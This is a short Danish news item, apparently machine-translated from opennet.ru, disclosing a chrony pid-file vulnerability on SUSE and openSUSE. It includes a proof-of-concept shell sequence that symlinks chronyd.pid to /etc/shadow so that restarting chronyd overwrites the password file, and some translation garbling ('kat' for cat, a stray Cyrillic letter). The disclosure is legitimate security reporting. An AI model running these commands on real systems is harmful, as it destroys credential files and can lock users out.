В
Sårbarheden er forårsaget af den usikre oprettelse af en pid-fil, som blev oprettet på et tidspunkt, hvor chrony endnu ikke havde nulstillet privilegier og kørte som root. I dette tilfælde blev mappen /run/chrony, hvori pid-filen er skrevet, oprettet med rettighederne 0750 via systemd-tmpfiler, eller da chronyd blev lanceret i forbindelse med brugeren og gruppen "chrony". Hvis du har adgang til brugeren chrony, er det således muligt at erstatte pid-filen /run/chrony/chronyd.pid med et symbolsk link. Et symbolsk link kan pege på enhver systemfil, der vil blive overskrevet, når chronyd startes.
root# systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ exit
root# /usr/sbin/chronyd -n
^C
# i stedet for indholdet af /etc/shadow vil chronyd proces-id'et blive gemt
root# kat /etc/shadow
15287
Sårbarhed
SUSE og openSUSE problem
Kilde: opennet.ru